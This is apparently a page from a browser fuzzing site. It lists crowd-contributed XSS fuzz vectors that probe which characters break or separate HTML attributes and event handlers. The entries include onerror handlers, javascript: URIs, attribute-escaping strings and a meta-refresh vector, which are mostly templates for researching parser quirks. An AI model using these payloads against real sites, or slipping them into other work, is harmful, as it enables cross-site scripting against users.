Featured vector

IE 11.0
<!-- sample vector --> <img src="xx:xx0x22onerror=alert(1)>

Fuzz vector cloud

3,344,404 Successful fuzzes

Fuzz Vectors

Searching for "Attributes"

Your browser identified as

General Crawlers unknown

All vectors

Description Vector Created by
Valid characters in on____ event handler attributes <img src on*chr*error=logChr(*num*)> @Lamp_Sec
HTML input image tag attributes that run JavaScript <input *datahtmlattributes*="customLog('*datahtmlattributes*')" type="image" src="about:blank"> @peksa
HTML input tag attributes that run JavaScript <input *datahtmlattributes*="customLog('*datahtmlattributes*')" type="text"> @peksa
Characters that dont inhibit eventhandlers <img src=xx:xx o*chr*nerror=logChr(*num*)> @tifkin_
Characters that break attribute names <img src=# aaa*chr*onerror="logChr(*num*)"> @albinowax
Characters allowed between attributes <img*chr*src=xx:xx*chr*onerror=logChr(*num*)> @tifkin_
Characters transformed in expando attributes <div id="fuzzelement*num*" expando*chr*="123">test</div> @garethheyes
Expandos attributes characters removed <div id="fuzzelement*num*" expando*chr*=123>test</div> @garethheyes
Equals equivalent signs in attributes <!-- sample vector --> <img src=xx:xx onerror*chr*logChr(*num*)> @WisecWisec
meta refresh tag content attribute url overwrite <!-- sample vector --> <META HTTP-EQUIV="refresh" CONTENT="0.1; URL=javascript:void()//?*chr*;URL=javascript:logChr(*num*)//"> @olemoudi
Characters that escape single quoted HTML attributes <img src='xx:x*chr* onerror="logChr(*num*)">'> @peksa
Characters syntactically equivalent to double quote in HTML attributes `"'><img src="#*chr* onerror=log(*num*)> @p_laguna
Attribute separators <img*chr*src=xx:xx*chr*onerror=logChr(*num*)> @garethheyes
Characters separating attributes without quotes after hash <img src=xx:xx#*chr*/onerror=logChr(*num*)> @garethheyes
Characters separating attributes without quotes <img src=xx:xx alt=`*chr*/onerror=logChr(*num*)//`> @garethheyes
Execute XSS through previousSibling replace in DOM using innerHTML and escaping right angle bracket <body> §iframe onload=confirm(/xss/)&gt; <img src=x:x onerror="innerHTML=previousSibling.nodeValue.replace('§','<')"> </body> *urlenc* @secalert
Alternatives to in attributes <img src=# onerror*chr*"log(*num*)" > @albinowax
Quoteless attributes breaker <img src=xxx:xxx title=1*chr*/onerror=logChr(*num*)> @garethheyes
Characters ignored in html event handler name <img src=x on*chr*Error="javascript:log(*num*)"/> @mhswende
Characters which break attributes without quotes <b id="id*num*" x=begin*chr*end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id*num*').getAttribute('x'))) { log(*num*);}</script> @shafigullin
Characters to separate class names in class attributes <div class="foo*num**chr*bar">HELLO</div> <script>document.getElementsByClassName('foo*num*')[0]?log(*num*):0</script> @0x6D6172696F
determine any chars can go between the onerror attributes <img src="x"*chr**chr*o*chr*n*chr*error="alert(*num*)"> @MisterJyu
Characters syntactically equivalent to single quote in HTML attributes `"'><img src='#*chr* onerror=log(*num*)> @_cweb
Characters syntactically equivalent to colon in a URI <a href="javascript*chr*alert(1)" id="fuzzelement*num*">test</a> @_cweb
Characters allowed after attribute name `"'><img src=xxx:x onerror*chr*=log(*num*)> @garethheyes
Characters allowed before attribute name `"'><img src=xxx:x *chr*onerror=log(*num*)> @garethheyes